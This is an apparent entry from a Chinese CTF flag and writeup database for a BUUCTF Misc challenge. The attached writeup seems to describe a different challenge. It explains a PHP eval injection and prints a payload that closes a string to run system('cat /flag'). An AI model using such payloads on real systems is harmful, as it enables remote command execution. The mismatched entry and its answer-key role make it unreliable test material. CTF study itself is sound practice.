[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

[DASCTF Oct X 吉林工师 欢迎来到魔法世界~]虚幻3

 广告模块
ID: 6299
标题: [DASCTF Oct X 吉林工师 欢迎来到魔法世界~]虚幻3
描述: wdb3
类型: Misc
网站: BUUCTF
题目链接: https://buuoj.cn/challenges#[DASCTF Oct X 吉林工师 欢迎来到魔法世界~]虚幻3
赛事: DASCTF Oct X 吉林工师 欢迎来到魔法世界~
年度: None
Flag值:
writeup: 验证后的网址
迷路的魔法少女的解题关键在于利用PHP的eval函数进行命令执行。通过构造attrid和attrvalue数组参数,闭合原有字符串并注入恶意代码。最终有效payload为:
?attrid[]=0&attrvalue[]=",1=>system('cat /flag'),3=>"
验证网址为:https://blog.csdn.net/cjdgg/article/details/121129574 1
答案错误,我要更正